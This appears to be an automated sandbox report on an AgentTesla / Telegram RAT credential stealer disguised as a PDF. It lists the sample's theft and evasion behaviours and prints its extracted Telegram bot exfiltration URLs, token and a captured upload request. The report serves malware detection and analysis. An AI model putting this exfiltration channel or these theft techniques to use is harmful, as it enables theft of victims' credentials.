Loading ...

Play interactive tourEdit tour

Windows Analysis Report 20220114080343434.pdf.exe

Overview

General Information

Sample Name:20220114080343434.pdf.exe
Analysis ID:553186
MD5:cd9290d22bb18ced32a1b81814888382
SHA1:83b1ce896dca71d611232fe4197cbe3993cccf64
SHA256:3876b600bafaaaf0a580e3925b9851c1c82ea16b40fb6b2b127296a523cf86fd
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected AntiVM3
Tries to steal Mail credentials (via file / registry access)
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large array initializations
Uses an obfuscated file name to hide its real file extension (double extension)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • 20220114080343434.pdf.exe (PID: 7036 cmdline: "C:\Users\user\Desktop\20220114080343434.pdf.exe" MD5: CD9290D22BB18CED32A1B81814888382)
    • RegSvcs.exe (PID: 6540 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Chat id": "2124798776", "Chat URL": "https://api.telegram.org/bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/sendDocument"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.558557812.000000000344E000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000009.00000000.304424534.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000009.00000000.304424534.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
        00000009.00000000.303933701.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000009.00000000.303933701.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
            Click to see the 21 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            1.2.20220114080343434.pdf.exe.28df808.2.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
              9.0.RegSvcs.exe.400000.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                9.0.RegSvcs.exe.400000.1.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                  9.0.RegSvcs.exe.400000.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    9.0.RegSvcs.exe.400000.4.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                      Click to see the 17 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper ArgumentsShow sources
                      Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: "C:\Users\user\Desktop\20220114080343434.pdf.exe" , ParentImage: C:\Users\user\Desktop\20220114080343434.pdf.exe, ParentProcessId: 7036, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 6540
                      Sigma detected: Possible Applocker BypassShow sources
                      Source: Process startedAuthor: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: "C:\Users\user\Desktop\20220114080343434.pdf.exe" , ParentImage: C:\Users\user\Desktop\20220114080343434.pdf.exe, ParentProcessId: 7036, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 6540

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 9.0.RegSvcs.exe.400000.3.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "2124798776", "Chat URL": "https://api.telegram.org/bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/sendDocument"}
                      Source: 20220114080343434.pdf.exe.7036.1.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/sendMessage"}
                      Machine Learning detection for sampleShow sources
                      Source: 20220114080343434.pdf.exeJoe Sandbox ML: detected
                      Source: 9.0.RegSvcs.exe.400000.3.unpackAvira: Label: TR/Spy.Gen8
                      Source: 9.0.RegSvcs.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                      Source: 9.0.RegSvcs.exe.400000.2.unpackAvira: Label: TR/Spy.Gen8
                      Source: 9.0.RegSvcs.exe.400000.1.unpackAvira: Label: TR/Spy.Gen8
                      Source: 9.0.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: 9.2.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: 20220114080343434.pdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49834 version: TLS 1.2
                      Source: 20220114080343434.pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: WellKnownSidTy.pdb source: 20220114080343434.pdf.exe

                      Networking:

                      barindex
                      Uses the Telegram API (likely for C&C communication)Show sources
                      Source: unknownDNS query: name: api.telegram.org
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: global trafficHTTP traffic detected: POST /bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8d9d7774673e43dHost: api.telegram.orgContent-Length: 1006Expect: 100-continueConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                      Source: RegSvcs.exe, 00000009.00000002.558108982.0000000003141000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: RegSvcs.exe, 00000009.00000002.558108982.0000000003141000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: RegSvcs.exe, 00000009.00000002.558108982.0000000003141000.00000004.00000001.sdmpString found in binary or memory: http://UeFrqT.com
                      Source: RegSvcs.exe, 00000009.00000002.558692920.00000000034B8000.00000004.00000001.sdmpString found in binary or memory: http://api.telegram.org
                      Source: RegSvcs.exe, 00000009.00000002.559897695.0000000006309000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: 20220114080343434.pdf.exe, 00000001.00000003.284299780.0000000005746000.00000004.00000001.sdmpString found in binary or memory: http://en.wE
                      Source: 20220114080343434.pdf.exe, 00000001.00000003.283895234.0000000005763000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.283933561.0000000005763000.00000004.00000001.sdmpString found in binary or memory: http://en.wikipedia
                      Source: 20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                      Source: RegSvcs.exe, 00000009.00000002.558653484.00000000034A5000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: 20220114080343434.pdf.exe, 00000001.00000003.286721278.0000000005747000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.286779303.0000000005747000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: 20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: 20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: 20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: 20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: 20220114080343434.pdf.exe, 00000001.00000003.291064337.000000000574D000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
                      Source: 20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: 20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                      Source: 20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: 20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: 20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: 20220114080343434.pdf.exe, 00000001.00000003.296024006.0000000005747000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.296414694.0000000005747000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.296538249.0000000005747000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comF
                      Source: 20220114080343434.pdf.exe, 00000001.00000003.291064337.000000000574D000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comalict
                      Source: 20220114080343434.pdf.exe, 00000001.00000003.291433983.000000000574E000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.291064337.000000000574D000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.291333441.000000000574C000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.291019852.000000000574C000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comd
                      Source: 20220114080343434.pdf.exe, 00000001.00000003.291433983.000000000574E000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.291064337.000000000574D000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.291333441.000000000574C000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.291019852.000000000574C000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comd1
                      Source: 20220114080343434.pdf.exe, 00000001.00000003.291064337.000000000574D000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comdf
                      Source: 20220114080343434.pdf.exe, 00000001.00000003.291433983.000000000574E000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.291064337.000000000574D000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.291333441.000000000574C000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.291019852.000000000574C000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comessed
                      Source: 20220114080343434.pdf.exe, 00000001.00000003.296414694.0000000005747000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000002.308506043.0000000005740000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.296538249.0000000005747000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comgrita
                      Source: 20220114080343434.pdf.exe, 00000001.00000003.296414694.0000000005747000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000002.308506043.0000000005740000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.296538249.0000000005747000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.como
                      Source: 20220114080343434.pdf.exe, 00000001.00000003.296024006.0000000005747000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.296414694.0000000005747000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000002.308506043.0000000005740000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.296538249.0000000005747000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comrsivo
                      Source: 20220114080343434.pdf.exe, 00000001.00000003.291433983.000000000574E000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comt:
                      Source: 20220114080343434.pdf.exe, 00000001.00000003.291433983.000000000574E000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.291333441.000000000574C000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.292482669.000000000574C000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comtoTF
                      Source: 20220114080343434.pdf.exe, 00000001.00000003.291433983.000000000574E000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comtto
                      Source: 20220114080343434.pdf.exe, 00000001.00000003.291064337.000000000574D000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.291333441.000000000574C000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.291019852.000000000574C000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comtuet:
                      Source: 20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
                      Source: 20220114080343434.pdf.exe, 00000001.00000003.285876732.0000000005747000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285978096.0000000005748000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.286031416.0000000005747000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: 20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: 20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: 20220114080343434.pdf.exe, 00000001.00000003.285978096.0000000005748000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cncr;
                      Source: 20220114080343434.pdf.exe, 00000001.00000003.286031416.0000000005747000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnl-g
                      Source: 20220114080343434.pdf.exe, 00000001.00000003.285978096.0000000005748000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnres
                      Source: 20220114080343434.pdf.exe, 00000001.00000003.285876732.0000000005747000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnu
                      Source: 20220114080343434.pdf.exe, 00000001.00000003.286031416.0000000005747000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnu-h
                      Source: 20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: 20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: 20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: 20220114080343434.pdf.exe, 00000001.00000003.288192818.000000000574D000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.288316807.000000000574D000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.287443277.000000000574B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: 20220114080343434.pdf.exe, 00000001.00000003.288192818.000000000574D000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.288316807.000000000574D000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.287443277.000000000574B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp//ft
                      Source: 20220114080343434.pdf.exe, 00000001.00000003.288192818.000000000574D000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.288316807.000000000574D000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
                      Source: 20220114080343434.pdf.exe, 00000001.00000003.288192818.000000000574D000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.288316807.000000000574D000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/#
                      Source: 20220114080343434.pdf.exe, 00000001.00000003.288192818.000000000574D000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.288316807.000000000574D000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/o
                      Source: 20220114080343434.pdf.exe, 00000001.00000003.287443277.000000000574B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/oby
                      Source: 20220114080343434.pdf.exe, 00000001.00000003.284070173.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285161013.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285111629.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285961664.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285793517.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285293155.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285058740.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284214946.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284952732.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.286439640.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.286763266.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285399043.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000002.308765282.00000000069D2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.287251981.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.287529116.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284121975.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284933681.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285324514.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285374134.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284765543.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285354419.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284255106.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285420297.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.287326441.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.287434034.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285188900.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.286611235.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285434027.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.287159497.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.286188290.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285233567.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285483737.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284391361.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.286700925.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284980871.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284169771.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284313551.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285598966.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284902558.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.286321696.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285564698.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.287504784.000000000575B000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: 20220114080343434.pdf.exe, 00000001.00000003.284070173.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285161013.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285111629.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285961664.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285793517.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285293155.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285058740.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284214946.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284952732.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.286439640.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.286763266.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285399043.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.287251981.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.287529116.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284121975.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284933681.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285324514.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285374134.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284765543.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285354419.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284255106.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285420297.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.287326441.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.287434034.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285188900.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.286611235.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285434027.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.287159497.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.286188290.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285233567.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285483737.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284391361.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.286700925.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284980871.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284169771.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284313551.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285598966.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284902558.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.286321696.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285564698.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.287504784.000000000575B000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com2
                      Source: 20220114080343434.pdf.exe, 00000001.00000003.285161013.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285111629.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285961664.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285793517.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285293155.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285058740.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284214946.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284952732.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.286439640.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.286763266.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285399043.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.287251981.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.287529116.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284933681.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285324514.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285374134.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284765543.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.285354419.000000000575B000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000001.00000003.284255106.000000000575B000.00000004.00000001.sdmp, 